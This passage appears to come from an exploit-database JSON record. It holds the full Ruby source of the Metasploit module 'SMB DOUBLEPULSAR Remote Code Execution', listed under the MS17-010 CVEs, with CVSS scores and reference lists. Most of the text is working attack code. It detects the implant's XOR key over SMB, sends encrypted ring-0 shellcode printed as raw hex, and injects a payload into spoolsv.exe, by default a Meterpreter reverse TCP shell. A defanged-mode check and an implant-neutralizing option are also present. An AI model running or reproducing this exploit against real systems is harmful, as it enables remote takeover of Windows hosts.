ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-05] #"}, "lastseen": "2021-09-04T22:15:58", "differentElements": ["sourceData"], "edition": 7}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "35c5b071c29de8d95160be1aaf06b334", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-05T22:11:00", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:154690", "PACKETSTORM:142602", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "rapid7community", 
"idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96703", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 
"idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-05T22:11:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-05T22:11:00", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => 
true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
